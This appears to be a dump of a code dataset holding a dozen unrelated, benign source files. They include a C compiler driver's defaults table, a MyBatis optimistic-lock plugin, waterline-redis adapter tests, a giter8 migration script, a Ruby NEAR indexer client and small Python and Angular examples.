#if (D_SUPPRESSED & D_LINKAGE)
    {".El", "=-El"},
#else
    {".El", "=-E+l"},
#endif
#ifdef TARGET_WANTS_FUNCTION_NAMES
    {".ff", "=-f+f"},
#else
    {".ff", "=-ff"},
#endif
    {".fa", "=-f+a"},
    {".fv", "=-f+v"},
#if (D_SUPPRESSED & D_ASSIGNTEST)
    {".Wa", "=-Wa"},
#else
    {".Wa", "=-W+a"},
#endif
#if (D_SUPPRESSED & D_DEPRECATED)
    {".Wd", "=-Wd"},
#else
    {".Wd", "=-W+d"},
#endif
#if (D_SUPPRESSED & D_IMPLICITFNS)
    {".Wf", "=-Wf"},
#else
    {".Wf", "=-W+f"},
#endif
#if (D_SUPPRESSED & D_GUARDEDINCLUDE)
    {".Wg", "=-Wg"},
#else
    {".Wg", "=-W+g"},
#endif
#if (D_SUPPRESSED & D_LOWERINWIDER)
    {".Wl", "=-Wl"},
#else
    {".Wl", "=-W+l"},
#endif
#if (D_SUPPRESSED & D_IMPLICITNARROWING)
    {".Wn", "=-Wn"},
#else
    {".Wn", "=-W+n"},
#endif
#if (D_SUPPRESSED & D_MULTICHAR)
    {".Wm", "=-Wm"},
#else
    {".Wm", "=-W+m"},
#endif
#if (D_SUPPRESSED & D_LONGLONGCONST)
    {".Wo", "=-Wo"},
#else
    {".Wo", "=-W+o"},
#endif
#if (D_SUPPRESSED & D_PPNOSYSINCLUDECHECK)
    {".Wp", "=-Wp"},
#else
    {".Wp", "=-W+p"},
#endif
#if (D_SUPPRESSED & D_STRUCTPADDING)
    {".Ws", "=-Ws"},
#else
    {".Ws", "=-W+s"},
#endif
#if (D_SUPPRESSED & D_FUTURE)
    {".Wu", "=-Wu"},
#else
    {".Wu", "=-W+u"},
#endif
#if (D_SUPPRESSED & D_IMPLICITVOID)
    {".Wv", "=-Wv"},
#else
    {".Wv", "=-W+v"},
#endif
#if (D_SUPPRESSED & D_STRUCTASSIGN)
    {".Wz", "=-Wz"},
#else
    {".Wz", "=-W+z"},
#endif
    /* C++-only diagnostic defaults. */
#ifdef CPLUSPLUS
# if (D_SUPPRESSED & D_CFRONTCALLER)
    {".Wc", "=-Wc"},
# else
    {".Wc", "=-W+c"},
# endif
# if (D_SUPPRESSED & D_IMPLICITCTOR)
    {".Wi", "=-Wi"},
# else
    {".Wi", "=-W+i"},
# endif
# if (D_SUPPRESSED & D_IMPLICITVIRTUAL)
    {".Wr", "=-Wr"},
# else
    {".Wr", "=-W+r"},
# endif
# if (D_SUPPRESSED & D_UNUSEDTHIS)
    {".Wt", "=-Wt"},
# else
    {".Wt", "=-W+t"},
# endif
#endif
    {".-Isearch","=-f+k"},
    {"-O", "=mix"},
#if defined(TARGET_IS_UNIX) || defined(TARGET_HAS_SEPARATE_CODE_DATA_SEGS)
    {".rolits", "=-fw"},
#else
    {".rolits", "=-f+w"},
#endif
    {".enums", "=-f+y"},
    {".schar", "=-z+c"},
    {".swilr", "=-f+z"},
    {"-gx", "?"},
    {"-gt", "=+p"},
    {"-g", "=-"},
    {".nowarn", "?"},
#ifdef PASCAL
    {".rd", "=-rd"},
#endif
#ifdef DEFAULT_DOES_NO_CSE
    {"-zpz", "=0"},
#else
    {"-zpz", "=1"},
#endif
    {"-D__CC_NORCROFT", "==1"},
    /*
     * Predefine some symbols that give basic information about the size
     * of objects. These are made to exist because ANSI rules mean that
     * one can not go
     *    #if sizeof(xxx) == nnn
     * as a pre-processing directive.
     */
    {"-D__sizeof_int", "==" xstr(sizeof_int)},
    {"-D__sizeof_long", "==" xstr(sizeof_long)},
    {"-D__sizeof_ptr", "==" xstr(sizeof_ptr)},
    { "-zat", "=" xstr(alignof_toplevel_static_default) },
    {NULL, NULL}   /* terminator */
};
/* Seed t with this build's defaults: the __ARMCC_VERSION define, the
 * builtin_defaults table, the configured driver_options, the target's
 * predefined macros, the PCC language default and (where supported)
 * target-specific toolenv defaults.  Also caches the first resulting
 * environment in cc_default_env.  Returns 0 on success, non-zero on
 * failure.
 */
int toolenv_insertdefaults(ToolEnv *t) {
    EnvItem const *p = builtin_defaults;
    char v[8];
    char const *s = TOOLVER_ARMCC;
    int i;
    int rc = 0;  /* fix: was read uninitialized when TARGET_SUPPORTS_TOOLENVS is undefined */
    /* Build "==<numeric version prefix>" (e.g. "==1.23") and define
     * __ARMCC_VERSION; bounded so a long version string cannot overrun v[]. */
    v[0] = v[1] = '=';
    for (i = 2; i < (int)sizeof(v) - 1 && (isdigit(s[0]) || s[0] == '.'); i++, s++)
        v[i] = s[0];
    v[i] = 0;
    tooledit_insert(t, "-D__ARMCC_VERSION", v);
    for (; p->name != NULL; p++) {
        /* 'st' (not 'rc') so the function result is not shadowed. */
        ToolEdit_InsertStatus st = tooledit_insert(t, p->name, p->val);
        if (st == TE_Failed) return 1;
    }
    /* Apply any extra options configured for this driver build. */
    { int argc = 0;
      char **argp;
      for (argp = driver_options; *argp != NULL; ++argp) argc++;
      read_options(0, argc, driver_options, t, NO);
    }
    { static char const * const predefs[] = TARGET_PREDEFINES;
      Uint i;
      for (i = 0; i < sizeof(predefs)/sizeof(predefs[0]); i++)
        /* note that the arg may be of the form "name" or "name=toks" */
        /* the "name" form is equivalent to "name=1". */
        AddDefine(t, predefs[i]);
    }
    if (setupenv.initial_flags & KEY_PCC)
        /* NOTE(review): other .lang values carry a leading '=' (e.g.
         * "=-ansi" in builtin_defaults); confirm "-pcc" is intended. */
        tooledit_insert(t, ".lang", "-pcc");
#ifdef TARGET_SUPPORTS_TOOLENVS
    rc = mcdep_toolenv_insertdefaults(t);
#endif
    TE_NormaliseEtc(t);
    if (cc_default_env == NULL) {
        cc_default_env = toolenv_copy(t);
    }
    return rc;
}
/* End of driver.c */
|
import { Order } from "./order";
/** Reasons for which a refund can be issued on an order. */
export declare enum RefundReason {
    DISCOUNT = "discount",
    RETURN = "return",
    SWAP = "swap",
    CLAIM = "claim",
    OTHER = "other"
}
/**
 * An amount of money returned to the customer for an order, typically
 * in connection with a return, swap or claim (see RefundReason).
 */
export declare class Refund {
    /** Primary id; prefixed with `ref_` per the schema comment below. */
    id: string;
    /** Id of the order this refund belongs to. */
    order_id: string;
    /** The related order entity. */
    order: Order;
    /** Amount refunded to the customer (integer, smallest currency unit per schema). */
    amount: number;
    /** Optional free-text explanation for the refund. */
    note: string;
    /** One of the RefundReason values. */
    reason: string;
    created_at: Date;
    updated_at: Date;
    /** Optional key-value map with additional information. */
    metadata: any;
    /** Key used to make refund creation idempotent. */
    idempotency_key: string;
    /** TypeORM lifecycle hook (runs before insert; implementation not visible here). */
    private beforeInsert;
}
/**
* @schema refund
* title: "Refund"
 * description: "A Refund represents an amount of money transferred back to the Customer for a given reason. Refunds may occur in relation to Returns, Swaps and Claims, but can also be initiated by a store operator."
* x-resourceId: refund
* properties:
* id:
* description: "The id of the Refund. This value will be prefixed with `ref_`."
* type: string
* order_id:
* description: "The id of the Order that the Refund is related to."
* type: string
* amount:
 * description: "The amount that has been refunded to the Customer."
* type: integer
* note:
* description: "An optional note explaining why the amount was refunded."
* type: string
* reason:
* description: "The reason given for the Refund, will automatically be set when processed as part of a Swap, Claim or Return."
* type: string
* enum:
* - discount
* - return
* - swap
* - claim
* - other
* created_at:
* description: "The date with timezone at which the resource was created."
* type: string
* format: date-time
* updated_at:
* description: "The date with timezone at which the resource was last updated."
* type: string
* format: date-time
* metadata:
* description: "An optional key-value map with additional information."
* type: object
*/
|
package com.controller;
import com.entity.User;
import com.service.UserService;
import org.aspectj.weaver.ast.Var;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import java.util.List;
import java.util.Map;
@Controller
@RequestMapping("/manage/user")
public class UserController {

    @Autowired
    private UserService userService;

    /**
     * Render the user-management page.
     *
     * All request parameters are bound into {@code map} and forwarded as
     * the filter criteria for the user listing.
     */
    @RequestMapping(value = {"", "/", "/index"})
    public String index(@RequestParam Map<String, Object> map, Model model) {
        List<User> users = userService.getlist(map);
        model.addAttribute("users", users);
        return "master/user";
    }
}
|
# A 3x3 grid stored as a list of row lists (row-major order).
my_2d_array = [
    [1, 2, 3],
    [4, 5, 6],
    [7, 8, 9],
]

row_to_retrieve = 2     # third row
column_to_retrieve = 0  # first column

# Index the outer list by row first, then the inner list by column.
retrieved_element = my_2d_array[row_to_retrieve][column_to_retrieve]
/**
* Test dependencies
*/
var assert = require('assert'),
Adapter = require('../../'),
Support = require('../support')(Adapter);
/**
* Raw waterline-redis `.find()` tests
*/
// Integration tests for the adapter's `.find()` against a live backing
// store, covering simple equality, comparison operators, string
// matchers, `in`-style queries, error handling and `limit`.
describe('adapter `.find()`', function() {

  // Create the `finders` collection and seed the two fixture records
  // every test below matches against (ages 19 and 18).
  // NOTE(review): the err from Support.Setup is not checked before the
  // first Adapter.create -- confirm this is intentional.
  before(function(done) {
    var definition = {
      id: {
        type: 'integer',
        primaryKey: true,
        autoIncrement: true
      },
      name: {
        type: 'string'
      },
      age: {
        type: 'integer'
      }
    };

    Support.Setup('finders', 'finders', definition, function(err) {
      Adapter.create('finders', 'finders', { name: '<NAME>', age: 19 }, function(err) {
        if(err) throw err;
        Adapter.create('finders', 'finders', { name: 'Annyong', age: 18 }, done);
      });
    });
  });

  // Drop the collection once the whole suite has run.
  after(function(done) {
    Support.Teardown('finders', 'finders', done);
  });

  // Plain equality criteria on single attributes.
  describe('simple', function() {
    it("should find using string `name`", function(done) {
      var criteria = { where: { name: '<NAME>' } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 1);
        assert(records[0].name === '<NAME>');
        done();
      });
    });

    it("should find using integer `age`", function(done) {
      var criteria = { where: { age: 18 } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 1);
        assert(records[0].age === 18);
        done();
      });
    });

    it("should return all records with empty criteria", function(done) {
      Adapter.find('finders', 'finders', {}, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 2);
        done();
      });
    });
  });

  // Operator-based criteria: string matchers, `in` lists, comparisons.
  describe("complex", function() {
    it("should properly return records using `startsWith`", function(done) {
      var criteria = { where: { name: { startsWith: 'Anny' } } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 1);
        assert(records[0].name === 'Annyong');
        done();
      });
    });

    it("should properly return records using `endsWith`", function(done) {
      var criteria = { where: { name: { endsWith: 'Holt' } } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 1);
        assert(records[0].name === '<NAME>');
        done();
      });
    });

    it("should properly return records using `like`", function(done) {
      // `like` lives at the top of `where`, keyed by attribute, with
      // SQL-style % wildcards.
      var criteria = { where: { like: { name: '%eve%' } } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 1);
        assert(records[0].name === '<NAME>');
        done();
      });
    });

    it("should properly return records using `contains`", function(done) {
      var criteria = { where: { name: { contains: 'nny' } } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 1);
        assert(records[0].name === 'Annyong');
        done();
      });
    });

    it("should properly return records using `in` type query", function(done) {
      // An array value means "match any of these".
      var criteria = { where: { name: ['<NAME>', 'Annyong'] } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 2);
        assert(records[0].name === '<NAME>');
        assert(records[1].name === 'Annyong');
        done();
      });
    });

    it("should properly return records using `lessThan`", function(done) {
      var criteria = { where: { age: { lessThan: 19 } } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 1);
        assert(records[0].name === 'Annyong');
        done();
      });
    });

    it("should properly return records using `lessThanOrEqual`", function(done) {
      var criteria = { where: { age: { lessThanOrEqual: 19 } } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 2);
        assert(records[0].name === '<NAME>');
        assert(records[1].name === 'Annyong');
        done();
      });
    });

    it("should properly return records using `greaterThan`", function(done) {
      var criteria = { where: { age: { greaterThan: 18 } } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 1);
        assert(records[0].name === '<NAME>');
        done();
      });
    });

    it("should properly return records using `greaterThanOrEqual`", function(done) {
      var criteria = { where: { age: { greaterThanOrEqual: 18 } } };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 2);
        assert(records[0].name === '<NAME>');
        assert(records[1].name === 'Annyong');
        done();
      });
    });
  });

  describe('additional functionality', function() {
    // Returns error, rather than dying.
    it("should gracefully fail on invalid criteria.", function(done) {
      // `captain` is not a supported operator, so the adapter should
      // surface an error instead of throwing.
      var criteria = {
        where: {
          name: {
            startsWith: 'Steve',
            captain : 'Stop making a mess'
          }
        }
      };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        assert(err.toString() === 'Error: Invalid query syntax!');
        assert(!records);
        done();
      });
    });

    it("should properly return records using `limit`", function(done) {
      var criteria = { where: { age: [18, 19] }, limit: 1 };

      Adapter.find('finders', 'finders', criteria, function(err, records) {
        if(err) throw err;

        assert(records);
        assert(records.length === 1);
        assert(records[0].name === '<NAME>');
        done();
      });
    });
  });
});
|
#!/bin/bash

# Giter8 scaffold hook: wires a newly generated $className$ page into
# the surrounding Play frontend project (routes, messages, test
# generators and the check-your-answers helper).  The $...$ tokens are
# g8 template placeholders expanded when the template is applied; the
# script itself runs from the migrations directory, hence the ../ paths.

echo ""
echo "Applying migration $className;format="snake"$"

# Register GET/POST routes for the page in both NormalMode and CheckMode.
echo "Adding routes to conf/app.routes"
echo "" >> ../conf/app.routes
echo "GET /:srn/new-return/$className;format="decap"$ controllers.$className$Controller.onPageLoad(mode: Mode = NormalMode, srn: String)" >> ../conf/app.routes
echo "POST /:srn/new-return/$className;format="decap"$ controllers.$className$Controller.onSubmit(mode: Mode = NormalMode, srn: String)" >> ../conf/app.routes
echo "GET /:srn/new-return/change$className$ controllers.$className$Controller.onPageLoad(mode: Mode = CheckMode, srn: String)" >> ../conf/app.routes
echo "POST /:srn/new-return/change$className$ controllers.$className$Controller.onSubmit(mode: Mode = CheckMode, srn: String)" >> ../conf/app.routes

# Append the page's English message keys.
echo "Adding messages to conf.messages"
echo "" >> ../conf/messages.en
echo "$className;format="decap"$.title = $className;format="decap"$" >> ../conf/messages.en
echo "$className;format="decap"$.heading = $className;format="decap"$" >> ../conf/messages.en
echo "$className;format="decap"$.checkYourAnswersLabel = $className;format="decap"$" >> ../conf/messages.en
echo "$className;format="decap"$.error.required = Enter $className;format="decap"$" >> ../conf/messages.en
echo "$className;format="decap"$.error.length = $className$ must be $maxLength$ characters or less" >> ../conf/messages.en

# Each awk block below splices generated Scala into an existing trait or
# class: it matches the anchor line, prints it, injects the new code,
# then copies the rest of the file unchanged (the trailing `1`).

echo "Adding to UserAnswersEntryGenerators"
awk '/trait UserAnswersEntryGenerators/ {\
    print;\
    print "";\
    print " implicit lazy val arbitrary$className$UserAnswersEntry: Arbitrary[($className$Page.type, JsValue)] =";\
    print " Arbitrary {";\
    print " for {";\
    print " page <- arbitrary[$className$Page.type]";\
    print " value <- arbitrary[String].suchThat(_.nonEmpty).map(Json.toJson(_))";\
    print " } yield (page, value)";\
    print " }";\
    next }1' ../test/generators/UserAnswersEntryGenerators.scala > tmp && mv tmp ../test/generators/UserAnswersEntryGenerators.scala

echo "Adding to PageGenerators"
awk '/trait PageGenerators/ {\
    print;\
    print "";\
    print " implicit lazy val arbitrary$className$Page: Arbitrary[$className$Page.type] =";\
    print " Arbitrary($className$Page)";\
    next }1' ../test/generators/PageGenerators.scala > tmp && mv tmp ../test/generators/PageGenerators.scala

echo "Adding to UserAnswersGenerator"
awk '/val generators/ {\
    print;\
    print " arbitrary[($className$Page.type, JsValue)] ::";\
    next }1' ../test/generators/UserAnswersGenerator.scala > tmp && mv tmp ../test/generators/UserAnswersGenerator.scala

echo "Adding helper method to CheckYourAnswersHelper"
awk '/class CheckYourAnswersHelper/ {\
    print;\
    print "";\
    print " def $className;format="decap"$: Option[Row] = userAnswers.get($className$Page) map {";\
    print " answer =>";\
    print " Row(";\
    print " key = Key(msg\"$className;format="decap"$.checkYourAnswersLabel\", classes = Seq(\"govuk-!-width-one-half\")),";\
    print " value = Value(lit\"\$answer\"),";\
    print " actions = List(";\
    print " Action(";\
    print " content = msg\"site.edit\",";\
    print " href = controllers.routes.$className$Controller.onPageLoad(CheckMode, srn).url,";\
    print " visuallyHiddenText = Some(msg\"site.edit.hidden\".withArgs(msg\"$className;format="decap"$.checkYourAnswersLabel\"))";\
    print " )";\
    print " )";\
    print " )";\
    print " }";\
    next }1' ../app/utils/CYAHelper.scala > tmp && mv tmp ../app/utils/CYAHelper.scala

echo "Migration $className;format="snake"$ completed"
|
class NumberManipulator:
    """Integer sequence utilities."""

    def manipulate_number(self, num):
        """Return the Collatz (3n + 1) sequence starting at ``num``.

        The sequence begins with ``num`` itself and ends when it reaches 1
        (halving even values, mapping odd values to ``3*num + 1``).

        Args:
            num: A positive integer starting point.

        Returns:
            list[int]: The full sequence from ``num`` down to 1.

        Raises:
            ValueError: If ``num`` is not a positive integer.  Without this
                check the loop never terminates for ``num < 1``.
        """
        if not isinstance(num, int) or isinstance(num, bool) or num < 1:
            raise ValueError("num must be a positive integer")
        sequence = [num]
        while num != 1:
            # Halve even values; apply 3n + 1 to odd values.
            num = num // 2 if num % 2 == 0 else num * 3 + 1
            sequence.append(num)
        return sequence
/**
* Copyright 2015-2016 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.shenjia.mybatis.generator.plugins;
import java.util.List;
import java.util.Optional;
import org.mybatis.generator.api.IntrospectedColumn;
import org.mybatis.generator.api.IntrospectedTable;
import org.mybatis.generator.api.PluginAdapter;
import org.mybatis.generator.api.dom.xml.Attribute;
import org.mybatis.generator.api.dom.xml.TextElement;
import org.mybatis.generator.api.dom.xml.VisitableElement;
import org.mybatis.generator.api.dom.xml.XmlElement;
import org.mybatis.generator.internal.util.StringUtility;
/**
*
* @author json
*
*/
/**
 * MyBatis Generator plugin adding optimistic-lock handling to the
 * generated update mappers: in every update statement the configured
 * lock column (default {@code version}) is rewritten so its SET clause
 * increments the value ({@code version = #{version} + 1}), and for
 * updateByPrimaryKey variants the WHERE clause additionally matches the
 * caller's current version.
 */
public class OptimisticLockPlugin extends PluginAdapter {

    /** Lock column name; overridable via the "lockColumnName" plugin property. */
    private String lockColumnName = "version";

    /** Read the optional "lockColumnName" property; the configuration is always accepted. */
    public boolean validate(List<String> warnings) {
        if (StringUtility.stringHasValue(properties.getProperty("lockColumnName"))) {
            this.lockColumnName = properties.getProperty("lockColumnName");
        }
        return true;
    }

    /** Delegates to the WithBLOBs variant -- the rewrite is identical. */
    @Override
    public boolean sqlMapUpdateByExampleWithoutBLOBsElementGenerated(XmlElement element,
            IntrospectedTable introspectedTable) {
        return sqlMapUpdateByExampleWithBLOBsElementGenerated(element, introspectedTable);
    }

    /**
     * Rewrite the first SET line that mentions the lock column so that it
     * assigns {@code javaProperty + 1} instead of the bound value.
     * NOTE(review): content.replaceAll treats the java property name as a
     * regex and replaces every occurrence in the line; also
     * indexOf(...) > 0 skips a match at position 0 -- confirm both are
     * safe for the generated SQL shapes.
     */
    @Override
    public boolean sqlMapUpdateByExampleWithBLOBsElementGenerated(XmlElement element,
            IntrospectedTable introspectedTable) {
        Optional<IntrospectedColumn> ic = introspectedTable.getColumn(lockColumnName);
        if (!ic.isPresent()) {
            String tableName = introspectedTable.getAliasedFullyQualifiedTableNameAtRuntime();
            System.err.println("[" + tableName + "] lock column not exists");
            return true;
        }
        String jp = ic.get().getJavaProperty();
        List<VisitableElement> elements = element.getElements();
        for (int i = 0; i < elements.size(); i++) {
            String content = ((TextElement) elements.get(i)).getContent();
            if (content.indexOf(lockColumnName) > 0) {
                elements.set(i, new TextElement(content.replaceAll(jp, jp + " + 1")));
                break;
            }
        }
        return true;
    }

    /**
     * Selective updateByExample: the SET clauses are nested {@code <if>}
     * elements, so walk them via updateSetNode() and patch the first one
     * that targets the lock column.
     */
    @Override
    public boolean sqlMapUpdateByExampleSelectiveElementGenerated(XmlElement element,
            IntrospectedTable introspectedTable) {
        try {
            Optional<IntrospectedColumn> ic = introspectedTable.getColumn(lockColumnName);
            if (!ic.isPresent()) {
                String tableName = introspectedTable.getAliasedFullyQualifiedTableNameAtRuntime();
                System.err.println("[" + tableName + "] lock column not exists");
                return true;
            }
            List<VisitableElement> elements = element.getElements();
            for (int i = 0; i < elements.size(); i++) {
                VisitableElement oldNode = elements.get(i);
                if (updateSetNode(oldNode, ic.get())) {
                    break;
                }
            }
        } catch (Exception e1) {
            e1.printStackTrace();
        }
        return true;
    }

    /** Delegates to the WithBLOBs variant -- the rewrite is identical. */
    @Override
    public boolean sqlMapUpdateByPrimaryKeyWithoutBLOBsElementGenerated(XmlElement element,
            IntrospectedTable introspectedTable) {
        return sqlMapUpdateByPrimaryKeyWithBLOBsElementGenerated(element, introspectedTable);
    }

    /**
     * updateByPrimaryKey: increment the lock column in its SET line and
     * extend the WHERE clause so the update only succeeds when the stored
     * version still equals the caller's version.
     */
    @Override
    public boolean sqlMapUpdateByPrimaryKeyWithBLOBsElementGenerated(XmlElement element,
            IntrospectedTable introspectedTable) {
        Optional<IntrospectedColumn> ic = introspectedTable.getColumn(lockColumnName);
        if (!ic.isPresent()) {
            String tableName = introspectedTable.getAliasedFullyQualifiedTableNameAtRuntime();
            System.err.println("[" + tableName + "] lock column not exists");
            return true;
        }
        String jp = ic.get().getJavaProperty();
        List<VisitableElement> elements = element.getElements();
        for (int i = 0; i < elements.size(); i++) {
            String content = ((TextElement) elements.get(i)).getContent();
            if (content.indexOf(lockColumnName) > 0) {
                elements.set(i, new TextElement(content.replaceAll(jp, jp + " + 1")));
                continue;
            }
            if (content.indexOf("where") >= 0) {
                elements.set(i, buildWhereElement(content, jp, ic.get().getJdbcTypeName()));
                break;
            }
        }
        return true;
    }

    /**
     * Selective updateByPrimaryKey: patch the nested SET {@code <if>}
     * elements, then splice the version check into the WHERE text node.
     */
    @Override
    public boolean sqlMapUpdateByPrimaryKeySelectiveElementGenerated(XmlElement element,
            IntrospectedTable introspectedTable) {
        try {
            Optional<IntrospectedColumn> ic = introspectedTable.getColumn(lockColumnName);
            if (!ic.isPresent()) {
                String tableName = introspectedTable.getAliasedFullyQualifiedTableNameAtRuntime();
                System.err.println("[" + tableName + "] lock column not exists");
                return true;
            }
            List<VisitableElement> elements = element.getElements();
            for (int i = 0; i < elements.size(); i++) {
                VisitableElement oldNode = elements.get(i);
                updateSetNode(oldNode, ic.get());
                VisitableElement newNode = updateWhereNode(oldNode, ic.get());
                if (null != newNode) {
                    elements.set(i, newNode);
                    break;
                }
            }
        } catch (Exception e1) {
            e1.printStackTrace();
        }
        return true;
    }

    /**
     * If element is a {@code <set>} node, find the child {@code <if>} whose
     * test mentions the lock column's java property and rewrite its first
     * text line to assign {@code property + 1}.  Returns true when a
     * rewrite happened.
     */
    private boolean updateSetNode(VisitableElement element, IntrospectedColumn ic) {
        if (!(element instanceof XmlElement)) {
            return false;
        }
        XmlElement xe = (XmlElement) element;
        if (!"set".equals(xe.getName())) {
            return false;
        }
        for (VisitableElement e : xe.getElements()) {
            if (!(e instanceof XmlElement)) {
                continue;
            }
            XmlElement setNode = (XmlElement) e;
            for (Attribute a : setNode.getAttributes()) {
                if (!"test".equals(a.getName())) {
                    continue;
                }
                String jp = ic.getJavaProperty();
                if (a.getValue().indexOf(jp) < 0) {
                    continue;
                }
                List<VisitableElement> elements = setNode.getElements();
                String content = ((TextElement) elements.get(0)).getContent();
                elements.set(0, new TextElement(content.replaceAll(jp, jp + " + 1")));
                return true;
            }
        }
        return false;
    }

    /**
     * If element is a text node containing "where ", return a replacement
     * with the optimistic-lock predicate spliced in; otherwise null.
     */
    private VisitableElement updateWhereNode(VisitableElement element, IntrospectedColumn ic) {
        if (!(element instanceof TextElement)) {
            return null;
        }
        String content = ((TextElement) element).getContent();
        if (content.indexOf("where ") < 0) {
            return null;
        }
        return buildWhereElement(content, ic.getJavaProperty(), ic.getJdbcTypeName());
    }

    /**
     * Insert {@code lockColumn = #{prop,jdbcType=TYPE} and } directly after
     * the "where " keyword (idx points just past "where "), keeping the
     * original predicate intact.
     */
    private TextElement buildWhereElement(String content, String javaProperty, String javaTypeName) {
        int idx = content.indexOf("where") + 6;
        StringBuilder buf = new StringBuilder(200);
        buf.append(content.substring(0, idx)).append(lockColumnName).append(" = #{").append(javaProperty)
            .append(",jdbcType=").append(javaTypeName).append("} and ").append(content.substring(idx));
        return new TextElement(buf.toString());
    }
}
|
module Near
  # Thin HTTP client for the NEAR indexer API.  All calls delegate to
  # Common::IndexerClient#get / #get_collection and wrap the JSON
  # payloads in the corresponding Near::* resource classes.
  class Client < Common::IndexerClient
    # Get current service status
    def status
      Near::Status.new(get('/status'))
    end

    # Get current chain height
    def current_height
      get('/height')['height']
    end

    # Get the most recent block, or nil when none is available
    def current_block
      Near::Block.new(get('/block'))
    rescue Common::IndexerClient::NotFoundError
      nil
    end

    # Get block by hash or height, or nil when not found
    def block(id)
      Near::Block.new(get("/blocks/#{id}"))
    rescue Common::IndexerClient::NotFoundError
      nil
    end
    alias block_by_hash block
    alias block_by_height block

    # Get block average times over the most recent `limit` blocks
    def block_times(limit = 100)
      Near::BlockTime.new(get('/block_times', limit: limit))
    end

    # Get block stats for a given time interval (raw options hash)
    def block_stats_charts(opts = {})
      get_collection(Near::BlockStat, '/block_stats', opts)
    end

    # Convenience form: `period` buckets of size `interval`
    # (defaults: 48 buckets of one hour).
    def block_stats(period: '48', interval: 'h')
      get_collection(Near::BlockStat, '/block_stats', limit: period, bucket: interval)
    end

    # Fetch a paginated listing of resource_class items from path
    def paginate(resource_class, path, opts = {})
      Near::PaginatedResponse.new(resource_class, get(path, opts))
    end

    # Get a single transaction by id
    def transaction(id)
      Near::Transaction.new(get("/transactions/#{id}"))
    end

    # Get validators
    def validators
      get_collection(Near::Validator, '/validators')
    end

    # Get validator by hash or height, folding the related account,
    # epoch and block data into the validator attributes.
    # NOTE(review): merge! uses symbol keys ('account':, 'epochs':,
    # 'blocks':) while the payload hash presumably uses string keys --
    # confirm Near::Validator accepts both.
    def validator(id)
      data = get("/validators/#{id}")
      data['validator'].merge!(
        'account': data['account'],
        'epochs': data['epochs'],
        'blocks': data['blocks']
      )
      Near::Validator.new(data['validator'])
    end
    alias validator_by_height validator

    # Get account by name
    def account(id)
      Near::Account.new(get("/accounts/#{id}"))
    end

    # Get delegations for the given account id
    def delegations(id)
      get_collection(Near::Delegation, "/delegations/#{id}")
    end
  end
end
|
#!/bin/bash
# Launch the elasticsearch-export jar with a bounded heap (256m-512m),
# server JIT, a heap dump to logs/ on OOM, external log4j2 and Spring
# configuration from ./config, UTF-8 file encoding, and verbose GC
# logging to logs/gc.log.  All script arguments are forwarded to the jar.
java -Xms256m -Xmx512m -server -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=logs -Dlogging.config=config/log4j2.xml -Dspring.config.location=config/application.yml -Dfile.encoding=UTF-8 -Xloggc:logs/gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -jar elasticsearch-export.jar "$@"
import pickle


class NonPicklableError(Exception):
    """Raised when an object refuses to be pickled.

    Defined before its first use so NonPicklableObject can raise it.
    """


class NonPicklableObject:
    """An object that deliberately refuses pickling via __reduce__."""

    def __reduce__(self):
        # Fix: raise the custom error (the original raised
        # NotImplementedError, which the except clause at the bottom
        # never caught, so the script crashed instead of printing).
        raise NonPicklableError("I am not picklable, fool!")


class SerializableModel:
    """Base class whose instances pickle to a no-argument reconstruction.

    The original also had an isinstance(self, NonPicklableObject) check
    here, but no class inherits from both, so it was dead code.
    """

    def __reduce__(self):
        # Reconstruct by calling the concrete class with no arguments.
        return (self.__class__, ())


class MockModelSkeleton(SerializableModel):
    def __init__(self):
        super(MockModelSkeleton, self).__init__()


# Pickling a picklable object
picklable_obj = MockModelSkeleton()
pickled_data = pickle.dumps(picklable_obj)
print("Pickled data for picklable object:", pickled_data)

# Attempting to pickle a non-picklable object
non_picklable_obj = NonPicklableObject()
try:
    pickle.dumps(non_picklable_obj)
except NonPicklableError as e:
    print("Exception raised when pickling non-picklable object:", e)
<filename>testapp/hybrid/app/main.ts
import * as angular from 'angular2/src/upgrade/angular_js';
import {myApp} from './myApp'
import {ng2} from './ng2'
import {ng1} from './ng1'
import {adapter} from './upgrader';
// AngularJS (1.x) host module for the ng1/ng2 hybrid demo application.
var ng1module = angular.module('hybridApp', []);

// Register the demo directives on the ng1 module: the app shell plus
// one Angular 2 component (downgraded) and one AngularJS component.
ng1module.directive('myApp', myApp);
ng1module.directive('ng2', ng2);
ng1module.directive('ng1', ng1);

// Bootstrap through the upgrade adapter so ng1 and ng2 components
// can interoperate within the same DOM tree.
adapter.bootstrap(document.body, ['hybridApp']);
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.